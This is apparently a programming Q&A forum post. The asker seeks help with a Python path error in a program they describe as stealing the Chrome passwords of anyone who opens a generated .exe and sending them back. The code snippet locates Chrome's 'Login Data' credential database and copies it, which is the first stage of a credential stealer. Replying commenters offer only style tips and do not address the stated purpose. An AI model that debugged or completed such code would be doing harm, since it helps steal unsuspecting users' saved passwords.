# python path error, [WinError 3] The system cannot find the path specified

Tags: python

Okay so basically in short this is a program that is made to take your chrome passwords by opening an .exe that is created in the end and sends you the passwords of that user that opened the .exe

I seem to constantly be faced with a path error that I can't figure out.
I'm not super good with python yet which could be the main problem but yeah, hope you guys can help with this :)

[Here's the error code after I run my .py command in cmd](https://i.stack.imgur.com/HRvrq.png)

Here's the piece of code that seems to be the issue.

```
path = os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Default\\Login Data"

path2 = os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Default\\Login2"

ASCII_TRANS = '_'*32 + ''.join([chr(x) for x in range(32, 126)]) + '_'*130
path = path.strip()
path = urllib.parse.unquote(path)
if path.translate(ASCII_TRANS) != path:  # Contains non-ascii
    path = path.decode('latin-1')
path = urllib.request.url2pathname(path)

ASCII_TRANS = '_'*32 + ''.join([chr(x) for x in range(32, 126)]) + '_'*130
path2 = path2.strip()
path2 = urllib.parse.unquote(path2)
if path2.translate(ASCII_TRANS) != path2:  # Contains non-ascii
    path2 = path2.decode('latin-1')
path2 = urllib.request.url2pathname(path2)
try:
    copyfile(path, path2)
except:
    pass
```

It's a path problem but honestly I have no f*cking clue what it could be

Comment: Can you include your error (or snippet thereof) inline with your question?

Comment: Be careful when using a bare `except` like that, see https://stackoverflow.com/questions/54948548/what-is-wrong-with-using-a-bare-except.

Comment: Also, you should look into using pathlib!

Comment: @Light Please don't attach images here. Paste it as code.